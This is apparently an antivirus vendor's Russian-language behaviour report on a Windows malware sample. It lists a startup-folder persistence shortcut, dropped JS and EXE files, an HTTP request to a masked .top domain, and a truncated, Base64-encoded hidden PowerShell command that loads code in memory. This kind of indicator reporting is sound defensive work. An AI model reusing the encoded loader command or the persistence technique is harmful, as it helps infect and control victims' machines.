Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\viva.ini.lnk
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\cdroller10_en.exe
- %APPDATA%\my.js
- %TEMP%\is-9qffd.tmp\cdroller10_en.tmp
- %TEMP%\is-v14cp.tmp\_isetup\_setup64.tmp
- %TEMP%\is-v14cp.tmp\rawdiskinst.dll
- %HOMEPATH%\appdata\viva.js
Сетевая активность
TCP
Запросы HTTP GET
- http://tu###ong.top/bit/I.mp3
UDP
- DNS ASK tu###ong.top
Другое
Создает и запускает на исполнение
- '%APPDATA%\cdroller10_en.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\My.js"
- '%TEMP%\is-9qffd.tmp\cdroller10_en.tmp' /SL5="$70234,9951931,409088,%APPDATA%\CDRoller10_en.exe"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...
